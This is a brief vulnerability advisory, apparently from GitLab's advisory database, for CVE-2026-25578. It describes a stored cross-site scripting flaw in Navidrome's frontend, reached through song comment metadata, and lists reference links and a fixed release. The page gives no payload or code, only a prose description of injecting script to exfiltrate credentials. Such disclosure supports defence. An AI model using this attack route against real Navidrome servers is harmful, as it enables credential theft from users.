CVE-2026-25578: Navidrome has XSS via comment from song metadata
(updated )
An XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.
An attacker’s maliciously crafted song has to be added to Navidrome to exploit the vulnerability.
References
- github.com/advisories/GHSA-rh3r-8pxm-hg4w
- github.com/navidrome/navidrome
- github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6
- github.com/navidrome/navidrome/releases/tag/v0.60.0
- github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w
- nvd.nist.gov/vuln/detail/CVE-2026-25578
Code Behaviors & Features
Detect and mitigate CVE-2026-25578 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →